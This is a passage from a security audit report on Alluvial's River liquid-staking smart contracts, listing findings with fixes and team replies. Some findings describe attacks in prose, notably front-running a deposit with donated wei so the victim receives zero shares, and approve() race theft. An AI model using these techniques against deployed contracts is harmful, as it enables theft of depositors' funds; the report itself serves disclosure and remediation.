might be trapped in WlsETH when burning one's balance. Severity: Medium Risk Context: WLSETH.1.sol#L140 Description: It is not possible to burn the exact amount of minted/deposited lsETH back because of the _value provided to burn is in ETH. Assume we've called mint(r,v) with our address r, then to get the v lsETH back to our address, we need to find an x where v = bx S B c and call burn(r, x) (Here S represents the total share of lsETH and B the total underlying value.). It's not always possible to find the exact x. So there will always be an amount locked in this contract ( v (cid:0) bx S B c ). These dust amounts can accumulate from different users and turn into a big number. To get the full amount back, the user needs to mint more wlsETH tokens so that we can find an exact solution to v = bx S B c. The extra amount to get the locked-up fees back can be engineered. The same problem exists for transfer and transferFrom. Also note, if you have minted x amount of shares, the balanceOf would tell you that you own b = b xB S c wlsETH. Internally wlsETH keeps track of the shares x. So users think they can only burn b amount, plug that in for the _value and in this case, the number of shares burnt would be b xB S cS B % $ which has even more rounding errors. wlsETH could internally track the underlying but that would not appropriate value like lsETH, which would basically be kind of wETH. We think the issue of not being able to transfer your full amount of shares is not as serious as not being able to burn back your shares into lsETH. On the same note, we think it would be beneficial to expose the wlsETH share amount to the end user: function sharesBalanceOf(address _owner) external view returns (uint256 shares) { return BalanceOf.get(_owner); } Recommendation: Allow the burn function to use the share amount as the unit of _value instead of avoiding locking up these dust amounts. Alluvial: Recommendation implemented in PR SPEARBIT/5. Spearbit: Acknowledged. 21 +6.3.4 BytesLib.concat can potentailly return results with dirty byte paddings. Severity: Medium Risk Context: BytesLib.sol#L23 Description: concat does not clean the potential dirty bytes that might have been copied from _postBytes (nor does it clean the padding). The dirty bytes from _postBytes are carried over to the padding for tempBytes. Recommendation: Consider modifiying the code to clean the byte padding or if the gas cost is not an issue you can replace the usage of BytesLib.concat in the codebase by bytes.concat. Alluvial: Resolved in SPEARBIT/6. Spearbit: Acknowledged. +6.3.5 The reportBeacon is prone to front-running attacks by oracle members Severity: Medium Risk Context: Oracle.1.sol#L289 Description: There could be a situation where the oracle members are segmented into 2 groups A and B , and members of the group A have voted for the report variant Va and the group B for Vb . Also, let's assume these two variants are 1 vote short of quorum. Then either group can try to front-run the other to push their submitted variant to river. Recommendation: Assume that • Q is the quorum • C is the total number of all oracle members • Ca is the number of oracle members you have voted for Va • Cb is the number of oracle members you have voted for Vb then in the scenario described we have: Ca = Cb = Q (cid:0) 1 Since for this frontrunning race to work we need one more oracle member in each group, we would have 2Q = (Ca + 1) + (Cb + 1) (cid:20) C ) Q (cid:20) C 2 So to mitigate this issue we would need to make sure Q . This invariant can be checked every time we modify the quorum or add a new oracle member. If we look at the last oracle member to vote differently as a free agent that can vote either way (so that we don't need two members to race against each other) then like the issue: C 2 • Decrementing the quorum in Oracle in some scenarios can open up a frontrunning/backrunning opportunity for some oracle members A better invariant would be: Q C + 1 2 Alluvial: Yes, this is a risk from the oracle that we could mitigate by having a large oracle member count + a high quorum to make collusion as hard as possible. Also, the sanity checks inside the oracle prevent very unusual updates of the validator balance sum so even if a collusion occurs they are bound to alter the balance up to what the sanity checks are allowing them, reducing the economical incentive behind such a move (is the max allowed delta worth it if you get removed from the system afterward?) 22 +6.3.6 Avoid multiple divisions when calculating operatorRewards Severity: Medium Risk Context: River.1.sol#L277 Description/Recommendation: In _onEarnings, we calculate the sharesToMint and operatorRewards by div- ing 2 numbers. We can reduce the number of divisions to 1 and also delegate this division to _rewardOperators. This would further avoid the rounding errors that we would get when we divide two numbers in EVM. So in: uint256 globalFee = GlobalFee.get(); uint256 numerator = _amount * currentTotalSupply * globalFee; uint256 denominator = (_assetBalance() * BASE) - (_amount * globalFee); uint256 sharesToMint = denominator == 0 ? 0 : (numerator / denominator); uint256 operatorRewards = (sharesToMint * OperatorRewardsShare.get()) / BASE; uint256 mintedRewards = _rewardOperators(operatorRewards); Instead of passing operatorRewards we can pass 2 values, one for the numerator and one for the denominator. This way we can avoid extra rounding errors introduced in _rewardOperators. _rewardOperators also need to be changed slightly to account for these 2 new values. uint256 globalFee = GlobalFee.get(); uint256 numerator = _amount * currentTotalSupply * globalFee * OperatorRewardsShare.get(); uint256 denominator = ((_assetBalance() * BASE) - (_amount * globalFee)) * BASE; uint256 mintedRewards; if(denominator != 0) { // note: this was added to avoid calling `_rewardOperators` if `denominator == 0` mintedRewards = _rewardOperators(numerator, denominator); } Without this correction, the rounding errors are in favor of the general users/stakers and the treasury of the River protocol (not the operators). Alluvial: The whole operator rewarding system has been removed in SPEARBIT/8. Spearbit: Acknowledged. +6.3.7 Shares distributed to operators suffer from rounding error Severity: Medium Risk Context: River.1.sol#L238 Description: _rewardOperators distribute a portion of the overall shares distributed to operators based on the number of active and funded validators that each operator has. The current number of shares distributed to a validator is calculated by the following code _mintRawShares(operators[idx].feeRecipient, validatorCounts[idx] * rewardsPerActiveValidator); where rewardsPerActiveValidator is calculated as uint256 rewardsPerActiveValidator = _reward / totalActiveValidators; This means that in reality each operator receives validatorCounts[idx] * (_reward / totalActiveValida- tors) shares. Such share calculation suffers from a rounding error caused by division before multiplication. Recommendation: Consider re-writing the number of shares distributed to each operator: 23 // removed --- > uint256 rewardsPerActiveValidator = _reward / totalActiveValidators; for (uint256 idx = 0; idx < validatorCounts.length;) { _mintRawShares( operators[idx].feeRecipient, (validatorCounts[idx] * _reward) / totalActiveValidators; ); ... Note that this will reduce the rounding error, but it adds 1 DIV gas cost (5 gas) per iteration. Also, the rounding errors favors the users/depositors. Alluvial: The whole operator rewarding system has been removed in SPEARBIT/8. Spearbit: Acknowledged. +6.3.8 OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator Severity: Medium Risk Context: OperatorsRegistry.1.sol#L403-L454 Description: Note that • limited → number of validators (already pushed by op) that have been approved by Alluvial and can be selected to be funded. • funded → number of validators funded. • stopped → number of validators exited (so that were funded at some point but for any reason they have exited the staking). The implementation of the function should favor operators that have the highest number of available validators to be funded. Nevertheless functions favor validators that have stopped value near the funded value. Consider the following example: Op at index 0 name op1 active true limit 10 funded 5 stopped 5 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 1) op1 and op2 have 10 validators whitelisted. 2) op1 at time1 get 5 validators funded. 3) op1 at time2 get those 5 validators exited, this mean that op.stopped == 5. In this scenario, those 5 validators would not be used because they are "blacklisted". At this point • op1 have 5 validators that can be funded. 24 • op2 have 10 validators that can be funded. pickNextValidators logic should favor operators that have the higher number of available keys (not funded but approved) to be funded. If we run operatorsRegistry.pickNextValidators(5); the result is this Op at index 0 name op1 active true limit 10 funded 10 stopped 5 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 Op1 gets all the remaining 5 validators funded, the function (from the specification of the logic) should instead have picked Op2. Check the Appendix for a test case to reproduce this issue. Recommendation: Alluvial should: • reimplement the logic of Operators. _hasFundableKeys that should select only active operators with fund- able keys without using the stopped attribute. • reimplement the logic inside the OperatorsRegistry. _getNextValidatorsFromActiveOperators loop to correctly pick the active operator with the higher number of fundable keys without using the stopped attribute. Alluvial: Recommendation implemented in SPEARBIT/3. While stopped is not used anymore to gather the list of active and fundable operators, it's still used in the sorting algorithm. As a result, it could happen that operators with stopped > 0 get picked before operators that have fundable keys but stopped === 0. Spearbit: Acknowledged. +6.3.9 approve() function can be front-ran resulting in token theft Severity: Medium Risk Context: SharesManager.1.sol#L143, WLSETH.1.sol#L116-L120 Description: The approve() function has a known race condition that can lead to token theft. If a user calls the approve function a second time on a spender that was already allowed, the spender can front-run the transaction and call transferFrom() to transfer the previous value and still receive the authorization to transfer the new value. Recommendation: Consider implementing functionality that allows a user to increase and decrease their al- lowance similar to Lido's implementation. This will help prevent users losing funds from front-running attacks. Alluvial: Recommendation implemented in SPEARBIT/9. Spearbit: Acknowledged. Note: if you want to follow the same logic of OpenZeppelin ERC20 implementa- tion, the _spendAllowance in both SharesManager and WLSETH should execute emit Approval(owner, spender, amount);. Alluvial: Fixed in PR 151. 25 +6.3.10 Add missing input validation on constructor/initializer/setters Severity: Medium Risk Description: Allowlist.1.sol • initAllowlistV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. • allow should check _accounts[i] to be not equal to address(0). Firewall.sol • constructor should check that: governor_ != address(0). executor_ != address(0). destination_ != address(0). • setGovernor should check that newGovernor != address(0). • setExecutor should check that newExecutor != address(0). OperatorsRegistry.1.sol • initOperatorsRegistryV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. • addOperator should check: _name to not be an empty string. _operator to not be address(0). _feeRecipi- ent to not be address(0). • setOperatorAddress should check that _newOperatorAddress is not address(0). • setOperatorFeeRecipientAddress should check that _newOperatorFeeRecipientAddress is not address(0). • setOperatorName should check that _newName is not an empty string. Oracle.1.sol • initOracleV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. Consider also adding some min and max limit to the values of _annualAprUpperBound and _relativeLowerBound and be sure that _epochsPerFrame, _slotsPerEpoch, _secondsPerSlot and _genesisTime matches the values expected. • addMember should check that _newOracleMember is not address(0). • setBeaconBounds: Consider adding min/max value that _annualAprUpperBound and _relativeLowerBound should respect. River.1.sol • initRiverV1: _globalFee should follow the same validation done in setGlobalFee. Note that client said that 0 is a valid _- globalFee value "The revenue redistributuon would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial." _operatorRewardsShare should follow the same validation done in setOperatorRewardsShare. Note that client said that 0 is a valid _operatorRewardsShare value "The revenue redistributuon would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial." ConsensusLayerDepositManager.1.sol • initConsensusLayerDepositManagerV1: _withdrawalCredentials should not be empty and follow the re- quirements expressed in the following official Consensus Specs document. 26 Recommendation: Consider implementing all the checks suggested above. Alluvial: Recommendation implemented in SPEARBIT/10. Some validation checks like on the admin not being address(0) will be addressed in another PR. Spearbit: Only empty check is performed on _withdrawalCredentials. _annualAprUpperBound and _rela- tiveLowerBound are still not checked in bothinitOracleV1 and setReportBounds. +6.3.11 LibOwnable._setAdmin allows setting address(0) as the admin of the contract Severity: Medium Risk Context: LibOwnable.sol#L8-L10 Description: While other contracts like RiverAddress (for example) do not allow address(0) to be used as set input parameter, there is no similar check inside LibOwnable._setAdmin. Because of this, contracts that call LibOwnable._setAdmin with address(0) will not revert and functions that should be callable by an admin cannot be called anymore. This is the list of contracts that import and use the LibOwnable library • AllowlistV1 • OperatorsRegistryV1 • OracleV1 • RiverV1 Recommendation: Consider adding a check inside LibOwnable._setAdmin to prevent setting address(0) as the admin, or move that specific check in each contract that import and use LibOwnable. Alluvial: Recommendation implemented in SPEARBIT/11. Spearbit: Note 1: Still missing (client said it will be implemented in other PRs) • Administrable miss all natspec comments • Event for _setAdmin are still missing but will be added to Initializable event in another PR Note 2: Client has acknowledged that all the contracts that inherit from Administrable have the ability to transfer ownership, even contracts like AllowlistV1 that didn't have the ability before this PR. Alluvial: Issues in Note 1 addressed in SPEARBIT/33. Spearbit: Acknowledged. +6.3.12 OracleV1.getMemberReportStatus returns true for non existing oracles Severity: Medium Risk Context: Oracle.1.sol#L115-L118 Description: memberIndex will be equal to -1 for non-existing oracles, which will cause the mask to be equal to 0, which will cause the function to return true for non-existing oracles. Recommendation: Consider changing the function to return false for memberIndex = -1 but bear in mind that if this function is used directly inside some part of the logic it could allow a not existing member to vote. In this case, the best solution is to always check if the member does not exist by checking if memberIndex >= 0. The function could otherwise revert if the member does not exist, and return true/false if it does exist and has voted/not voted. If this solution is chosen, remember that if integrated directly into the code could create a DOS scenario if not handled correctly. For all these reasons, consider properly documenting the behavior of the function and the possible side effects in the natspec comment. 27 Alluvial: Fixed in SPEARBIT/12 by returning false for non-existing oracles. Spearbit: Acknowledged. +6.3.13 Operators might add the same validator more than once Severity: Medium Risk Context: OperatorsRegistry.1.sol#L270 Description: Operators can use OperatorsRegistryV1.addValidators to add the same validator more than once. Depositors' funds will be directed to these duplicated addresses, which in turn, will end up having more than 32 eth. This act will damage the capital efficiency of the entire deposit pool and thus will potentially impact the pool's APY. Recommendation: Consider adding a de-duplication mechanism. Alluvial: Acknowledged. +6.3.14 OracleManager.setBeaconData possible front running attacks Severity: Medium Risk Context: River.1.sol#L27 Description: The system is designed in a way that depositors receive shares (lsETH) in return for their eth de- posit. A share represents a fraction of the total eth balance of the system in a given time. Investors can claim their staking profits by withdrawing once withdrawals are active in the system. Profits are being pulled from ELFeeRe- cipient to the River contract when the oracle is calling OracleManager.setBeaconData. setBeaconData updates BeaconValidatorBalanceSum which might be increased or decreased (as a result of slashing for instance). Investors have the ability to time their position in two main ways: • Investors might time their deposit just before profits are being distributed, thus harvesting profits made by others. • Investors might time their withdrawal / sell lsETH on secondary markets just before the loss is realized. By doing this, they will effectively avoid the loss, escaping the intended mechanism of socializing losses. Recommendation: As for the first issue, we recommend considering replacing the accounting logic with a different model that takes into account the timing of the deposit. In this case, as communicated with the team, oracles are supposed to call OracleManager.setBeaconData on a daily basis, which will limit the impact of such a strategy. However, we do recommend the off-chain monitoring of oracles' activity to make sure that the impact of this issue stays limited. The second issue will have to be tackled once there is more certainty about the withdrawal process. Alluvial: Resolved in SPEARBIT/13 Spearbit: It will solve the issue but will introduce further reliance on oracles, and will make it harder to track their performance in general. Alluvial: It indeed adds more opacity around operators but all the keys are inside the contract and anyone could map the keys to the operators and track their performance. For now, we decided to move the operator rewards outside of River and we will use an approach that is similar to what we were doing on-chain at first, but we will work on adding more granularity to the rewards by taking into account how efficient their validators are. Adding this on-chain would make everything a lot more complicated, the oracle reports would need to perform a huge ton of extra work (we prefer having simple oracles that operators and integrators could easily run so we increase the quorum as the protocol grows than requiring bigger hardware requirements and making it a pain to operate) Spearbit: Acknowledged. 28 +6.3.15 SharesManager._mintShares - Depositors may receive zero shares due to front-running Severity: Medium Risk Context: SharesManager.1.sol#L202 Description: The number of shares minted to a depositor is determined by (_underlyingAssetValue * _total- Supply()) / oldTotalAssetBalance. Potential attackers can spot a call to UserDepositManagerV1._deposit and front-run it with a transaction that sends wei to the contract (by self-destructing another contract and sending the funds to it), causing the victim to receive fewer shares than what he expected. More specifically, In case old- TotalAssetBalance() is greater than _underlyingAssetValue * _totalSupply(), then the number of shares the depositor receives will be 0, although _underlyingAssetValue will be still pulled from the depositor’s balance. An attacker with access to enough liquidity and to the mem-pool data can spot a call to UserDepositManagerV1._- deposit and front-run it by sending at least totalSupplyBefore * (_underlyingAssetValue - 1) + 1 wei to the contract . This way, the victim will get 0 shares, but _underlyingAssetValue will still be pulled from its account balance. In this case, the attacker does not necessarily have to be a whitelisted user, and it is important to mention that the funds that were sent by him can not be directly claimed back, rather, they will increase the price of the share. The attack vector mentioned above is the general front runner case, the most profitable attack vector will be the case where the attacker is able to determine the share price (for instance if the attacker mints the first share). In this scenario, the attacker will need to send at least attackerShares * (_underlyingAssetValue - 1) + 1 to the contract, (attackerShares is completely controlled by the attacker, and thus can be 1). In our case, depositors are whitelisted, which makes this attack harder for a foreign attacker. Recommendation: Consider adding a validation check enforcing that sharesToMint > 0. Spearbit: The fix presented in issue An attacker can freeze all incoming deposits and brick the oracle members' reporting system with only 1 wei also fixes this vulnerability. 6.4 Low Risk +6.4.1 Orphaned (index, values) in SlotOperator storage slots in operatorsRegistry Severity: Low Risk Context: Operators.sol#L261-L263 Description: If !opExists corresponds to an operator which has OperatorResolution.active set to false, the line below can leave some orphaned (index, values) in SlotOperator storage slots: _setOperatorIndex(name, newValue.active, r.value.length - 1); Recommendation: In the case !opExists corresponds to an operator which has OperatorResolution.active set to false, we can clear the storage for those operators. Unless, Alluvial would like to keep a record of those operators on-chain. Alluvial: Issue does not exist anymore given that the referenced code has been removed in SPEARBIT/14. Spearbit: Acknowledged. 29 +6.4.2 A malicious operator can purposefully mismanage its validators to benefit from lsETH market price movements. Severity: Low Risk Context: operatorsRegistry/Operators.sol#L11 Description: At some point, an operator might find it beneficial to let its validators get slashed or just turn them off. Meanwhile short on a lsETH / WlsETH position on a market. The effect of this operator's validators getting slashed can move the market for those coins. If the operator would also be able to calculate and time this market position move precisely, they can take flash-loan to even gain a higher leverage/reward. Related: LID-02, 5.4 Malicious Node Operators Alluvial: Acknowledged. +6.4.3 Warn the admin and the operator that setOperatorName has other side-effects Severity: Low Risk Context: OperatorsRegistry.1.sol#L196 Description: Need to warn the admin and the operator that setOperatorName sets the OperatorResolu- tion.active to true for this name as a side-effect. This warning is more important for the admin since only active operators can call into this function. Alluvial: Resolved in SPEARBIT/14. by removing this function. Spearbit: Acknowledged. +6.4.4 OperatorsRegistry.setOperatorName Possible front running attacks Severity: Low Context: OperatorsRegistry.1.sol#L196-L204 Description: 1. setOperatorName reverts for an already used name, which means that a call to setOperatorName might be front-ran using the same name. The front-runner can launch the same attack again and again thus causing a DoS for the original caller. 2. setOperatorName can be called either by an operator (to edit his own name) or by the admin. setOpera- torName will revert for an already used _newName. setOperatorName caller might be front-ran by the identical transaction transmitted by someone else, which will lead to failure for his transaction, where in practice this failure is a "false failure" since the desired change was already made. Recommendation: 1. Consider changing the current mechanism to be based on a commit-reveal scheme. The idea is to add a commitName function that will store hash(msg.sender, _newName) for the msg.sender. This function will have to be called before the call to setOperatorName, which will implement the "reveal" side, validating that hash(msg.sender, _newName) exists, and if so, change the previous name to the new name, and clears the value previously stored in commitName. 2. The off-chain code that calls setOperatorName should handle this case by querying the name of the operator even when the transaction fails, if it is the desired name, then it should be considered successful. Alluvial: Fixed in SPEARBIT/14. Spearbit: The provided PR resolves the issues above, but it allows duplicated names. Are you ok with that? Alluvial: yes, we completely removed the name unicity and are now working entirely with indexes as unique identifiers. Names are considered as informational off chain data now. it also makes things a lot easier to read imo. 30 Spearbit: Acknowledged. +6.4.5 Prevent users from burning token via lsETH/wlsETH transfer or transferFrom functions Severity: Low Risk Context: SharesManager.1.sol#L158-L165, WLSETH.1.sol#L157-L165 Description: The current implementation of both lsETH (SharesManager component of River contract) and wlsETH allow the user to "burn" tokens, sending them directly to the address(0) via the transfer and transferFrom function. By doing that, it would bypass the logic of the existing burn functions present right now (or in the future when withdrawals will be enabled in River) in the protocol. Recommendation: Add a check to both _transfer functions to prevent the user to transfer tokens to the ad- dress(0) Consider also to adopt the same checks on address(0) done by the OpenZeppelin ERC20 implemen- tation, where needed and possible. Alluvial: Recommendation implemented in SPEARBIT/9. Spearbit: Acknowledged. 6.5 Gas Optimization +6.5.1 In addOperator when emitting an event use stack variables instead of reading from memory again Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L161 Description: In OperatorsRegistry's addOperator function when emitting the AddedOperator event we read from memory all the event parameters except operatorIndex. emit AddedOperator(operatorIndex, newOperator.name, newOperator.operator, newOperator.feeRecipient); We can avoid reading from memory to save gas. Recommendation: Use the stack variables already defined in the scope. emit AddedOperator(operatorIndex, _name, _operator, _feeRecipient); This would also be consistent with other events emitted in the functions defined in OperatorsRegistry. Alluvial: Implemented in PR 151. from the Operators.Operator struct. Implementation is slightly different since _feeRecipient has been removed Spearbit: Acknowledged. +6.5.2 Avoid slicing and concatenating by passing a different pattern of bytes to addValidators Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L270, OperatorsRegistry.1.sol#L289-L292 Description/Recommendation: We can pass bytes calldata _publicKeys, bytes calldata _signatures also concatenated like ... And call that bytes calldata _publicKeysAndSignatures. This way we would only slice once in the for loop. Also, we can modify the ValidatorKeys.set to accept a concatenated publicKey and signatures. That way we can also avoid the concatenation that happens again in ValidatorKeys.set. 31 ValidatorKeys.sol#L64-L65 function set(uint256 operatorIndex, uint256 idx, bytes memory publicKey, bytes memory signature) ,! internal { bytes memory concatenatedKeys = BytesLib.concat(publicKey, signature); Alluvial: Implemented in SPEARBIT/24. Spearbit: Acknowledged. +6.5.3 Cache _indexes[_indexes.length - 1] in removeValidators to avoid reading from storage multiple times. Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L344-L345 Description/Recommendation: Cache _indexes[_indexes.length - 1] into a new variable to read it only once. testExecutorCanSetOperatorLimit() (gas: -1 (-0.000%)) testGovernorCanSetOperatorLimit() (gas: -1 (-0.000%)) Overall gas change: -2 (-0.000%) uint256 lastIndex = _indexes[_indexes.length - 1]; if (lastIndex < operator.limit) { operator.limit = lastIndex; } Alluvial: Recommendation implemented in PR SPEARBIT/24. Spearbit: Acknowledged. +6.5.4 Avoid updating operator.keys storage slot inside of a loop in removeValidators Severity: Gas Optimization Context: OperatorsRegistry.1.sol#L310-L347 Description/Recommendation: Along with other minor gas optimizations, we can take operator.keys updates outside of the for loop to avoid updating this storage slot multiple times. The update can happen outside of the loop. testBurnWrappedTokensWithRebase(uint256,uint32) (gas: -2 (-0.000%)) testBurnWrappedTokensInvalidTransfer(uint256,uint32) (gas: 2 (0.000%)) testBurnWrappedTokens(uint256,uint32) (gas: -2 (-0.000%)) testTransferFrom(uint256,uint256,uint256,uint32) (gas: 4 (0.000%)) testBalanceOfEdits(uint256,uint32) (gas: -3 (-0.000%)) testRemoveMember(uint256) (gas: 2 (0.000%)) testTransfer(uint256,uint256,uint32) (gas: -5 (-0.000%)) testBalanceOfEditsMultiBurnsAndRebase(uint256) (gas: -7 (-0.000%)) testTotalSupplyEditsMultiBurnsAndRebase(uint256) (gas: 7 (0.000%)) testRemoveValidatorsKeyOutOfBounds(bytes32,uint256,uint256) (gas: -169 (-0.000%)) testRemoveValidatorsAndRetrieveAsAdmin(bytes32,uint256,uint256) (gas: -170 (-0.000%)) testRemoveValidatorsFundedKeyRemovalAttempt(bytes32,uint256,uint256) (gas: 215 (0.000%)) testRemoveValidatorsAsOperator(bytes32,uint256,uint256) (gas: -5325 (-0.002%)) testRemoveValidatorsAsAdmin(bytes32,uint256,uint256) (gas: -5351 (-0.002%)) testRemoveValidatorsUnsortedIndexes(bytes32,uint256,uint256) (gas: -20864 (-0.014%)) testTotalSupply(uint256,uint128,uint128) (gas: -6700 (-0.058%)) testBreakingLowerBoundLimit(uint64,uint64,uint32) (gas: -19196 (-0.078%)) testSetBeaconBounds(uint256,uint64) (gas: -4800 (-0.171%)) Overall gas change: -62361 (-0.326%) 32 An example of a different implementation: function removeValidators(uint256 _index, uint256[] calldata _indexes) external operatorOrAdmin(_index) ,! { uint256 indexesLength = _indexes.length; if (indexesLength == 0) { revert InvalidKeyCount(); } Operators.Operator storage operator = Operators.getByIndex(_index); uint256 totalKeys = operator.keys; if (!(_indexes[0] < totalKeys)) { revert InvalidIndexOutOfBounds(); } uint256 lastIndex = _indexes[_indexes.length - 1]; if (lastIndex < operator.funded) { revert InvalidFundedKeyDeletionAttempt(); } if (lastIndex < operator.limit) { operator.limit = lastIndex; } operator.keys = totalKeys - indexesLength; uint256 idx; for (; idx < indexesLength;) { uint256 keyIndex = _indexes[idx]; if (idx > 0 && !(keyIndex < _indexes[idx - 1])) { revert InvalidUnsortedIndexes(); } unchecked { ++idx; } uint256 lastKeyIndex = totalKeys - idx; (bytes memory removedPublicKey,) = ValidatorKeys.get(_index, keyIndex); (bytes memory lastPublicKey, bytes memory lastSignature) = ValidatorKeys.get(_index, ,! lastKeyIndex); ValidatorKeys.set(_index, keyIndex, lastPublicKey, lastSignature); ValidatorKeys.set(_index, lastKeyIndex, new bytes(0), new bytes(0)); emit RemovedValidatorKey(_index, removedPublicKey); } } Alluvial: Implemented in SPEARBIT/24. Spearbit: Acknowledged. 33 +6.5.5 Cache storage related variables in WLSETH.1.sol::burn to save gas. Severity: Gas Optimization Context: WLSETH.1.sol#L140-L151 Description/Recommendation: BalanceOf.get(msg.sender) to avoid reading from storage mutiple times. cache can We IRiverV1(payable(RiverAddress.get())) and testRemoveValidatorsAsAdmin(bytes32,uint256,uint256) (gas: -2 (-0.000%)) testRemoveValidatorsAsOperator(bytes32,uint256,uint256) (gas: 10 (0.000%)) testRemoveMember(uint256) (gas: 2 (0.000%)) testTransferFrom(uint256,uint256,uint256,uint32) (gas: -580 (-0.002%)) testTransfer(uint256,uint256,uint32) (gas: -611 (-0.002%)) testTotalSupplyEdits(uint256,uint32) (gas: -587 (-0.003%)) testBalanceOfEdits(uint256,uint32) (gas: -590 (-0.003%)) testBurnWrappedTokensWithRebase(uint256,uint32) (gas: -592 (-0.003%)) testBurnWrappedTokens(uint256,uint32) (gas: -587 (-0.003%)) testBurnWrappedTokensInvalidTransfer(uint256,uint32) (gas: -593 (-0.003%)) testBalanceOfEditsMultiBurnsMultiUserAndRebase(uint256,uint256) (gas: -3550 (-0.010%)) testBalanceOfEditsMultiBurnsAndRebase(uint256) (gas: -3557 (-0.014%)) testTotalSupplyEditsMultiBurnsAndRebase(uint256) (gas: -3552 (-0.014%)) testSetBeaconBounds(uint256,uint64) (gas: -4800 (-0.171%)) Overall gas change: -19589 (-0.227%) function burn(address _recipient, uint256 _value) external nonReentrant { IRiverV1 river = IRiverV1(payable(RiverAddress.get())); uint256 balance = BalanceOf.get(msg.sender); uint256 callerUnderlyingBalance = river.underlyingBalanceFromShares(balance); if (_value > callerUnderlyingBalance) { revert BalanceTooLow(); } uint256 sharesAmount = river.sharesFromUnderlyingBalance(_value); BalanceOf.set(msg.sender, balance - sharesAmount); if (!river.transfer(_recipient, sharesAmount)) { revert TokenTransferError(); } } Alluvial: The final implementation is a bit different but the caching suggestions have been applied in PRs: • [SPEARBIT/5] Remove dust on WLSETH burn • [SPEARBIT/33] Documentation and natspec Spearbit: Acknowledged. +6.5.6 Replace pad64 with abi.encodePacked Severity: Gas Optimization Context: ConsensusLayerDepositManager.1.sol#L109, ConsensusLayerDepositManager.1.sol#L113 Description/Recommendation: Using the native abi.encodePacked just like Ethereum 2.0 deposit contract in- stead of pad64 would save a considerable amount of gas. And since these are the only 2 places that BytesLib.pad64 has been used, we can remove this helper function from the codebase, unless the team is planning to use it elsewhere. 34 testInitWithZeroAddressValue() (gas: -24260 (-0.009%)) testUserDepositsOperatorWithStoppedValiadtors() (gas: -39038 (-0.018%)) testUserDepositsForAnotherUser() (gas: -44258 (-0.019%)) testDeniedUser() (gas: -44258 (-0.019%)) testELFeeRecipientPullFunds() (gas: -44258 (-0.019%)) testUserDeposits() (gas: -44258 (-0.019%)) testNoELFeeRecipient() (gas: -44258 (-0.019%)) testUserDepositsTenPercentFee() (gas: -44258 (-0.019%)) testUserDepositsFullAllowance() (gas: -44258 (-0.019%)) testUserDepositsUnconventionalDeposits() (gas: -44740 (-0.019%)) testValidatorsPenaltiesEqualToExecLayerFees() (gas: -44258 (-0.020%)) testValidatorsPenalties() (gas: -44258 (-0.020%)) testDepositTwentyValidators() (gas: -12938 (-0.023%)) testDepositTenValidators() (gas: -12938 (-0.023%)) Overall gas change: -532236 (-0.265%) bytes32 pubkeyRoot = sha256(abi.encodePacked(_publicKey, bytes16(0))); bytes32 signatureRoot = sha256( abi.encodePacked( sha256(BytesLib.slice(_signature, 0, 64)), sha256(abi.encodePacked(BytesLib.slice(_signature, 64, SIGNATURE_LENGTH - 64), bytes32(0))) ) ); Alluvial: Resolved in SPEARBIT/6. Spearbit: Acknowledged. +6.5.7 Unroll loops with a fixed number of iterations to avoid extra gas costs. Severity: Gas Optimization Context: Uint256Lib.sol#L8-L13 Description/Recommendation: Since the number of loops is known at compile time, we can unroll it to avoid the extra variable in the stack (i) and also avoid the conditional JUMPI and JUMPDEST opcodes. Here is what the unrolling would look like: 35 result = temp_value & 0xFF; temp_value >>= 8; result = (result << 8) | (temp_value & 0xFF); temp_value >>= 8; result = (result << 8) | (temp_value & 0xFF); temp_value >>= 8; result = (result << 8) | (temp_value & 0xFF); temp_value >>= 8; result = (result << 8) | (temp_value & 0xFF); temp_value >>= 8; result = (result << 8) | (temp_value & 0xFF); temp_value >>= 8; result = (result << 8) | (temp_value & 0xFF); temp_value >>= 8; result = (result << 8) | (temp_value & 0xFF); temp_value >>= 8; and the overall gas saving: testInitWithZeroAddressValue() (gas: 9430 (0.004%)) testUserDepositsOperatorWithStoppedValiadtors() (gas: -14790 (-0.007%)) testUserDepositsForAnotherUser() (gas: -16762 (-0.007%)) testDeniedUser() (gas: -16762 (-0.007%)) testELFeeRecipientPullFunds() (gas: -16762 (-0.007%)) testUserDepositsUnconventionalDeposits() (gas: -16762 (-0.007%)) testUserDeposits() (gas: -16762 (-0.007%)) testNoELFeeRecipient() (gas: -16762 (-0.007%)) testUserDepositsTenPercentFee() (gas: -16762 (-0.007%)) testUserDepositsFullAllowance() (gas: -16762 (-0.007%)) testValidatorsPenaltiesEqualToExecLayerFees() (gas: -16762 (-0.007%)) testValidatorsPenalties() (gas: -16762 (-0.008%)) testDepositTwentyValidators() (gas: -4930 (-0.009%)) testDepositTenValidators() (gas: -4930 (-0.009%)) Overall gas change: -182840 (-0.093%) It would be best to define a constant for 0xFF as well. Note the deposit contract uses a similar method as the unrolled loop here. Alluvial: Recommendation implemented in SPEARBIT/25. Spearbit: Acknowledged. 36 +6.5.8 Rewrite pad64 so that it doesn't use BytesLib.concat and BytesLib.slice to save gas Severity: Gas Optimization Context: BytesLib.sol#L5-L21 Description: We can avoid using the BytesLib.concat and BytesLib.slice and write pad64 mostly in assembly. Since the current implementation adds more memory expansion than needed (also not highly optimized). Recommendation: Here is an implementation mostly in assembly: function pad64(bytes memory _b) internal pure returns (bytes memory res) { assert(_b.length >= 32 && _b.length <= 64); if (64 == _b.length) { return _b; } // SPDX-License-Identifier: MIT assembly { // load free memory pointer let freeMemPtr := mload(0x40) res := freeMemPtr // store length of the new array as 0x40 = 64 mstore(freeMemPtr, 0x40) // advance free memory pointer freeMemPtr := add(freeMemPtr, 0x20) // store the 1st 32 bytes of `_b` in the next memory slot mstore(freeMemPtr, mload(add(_b, 0x20))) // advance free memory pointer 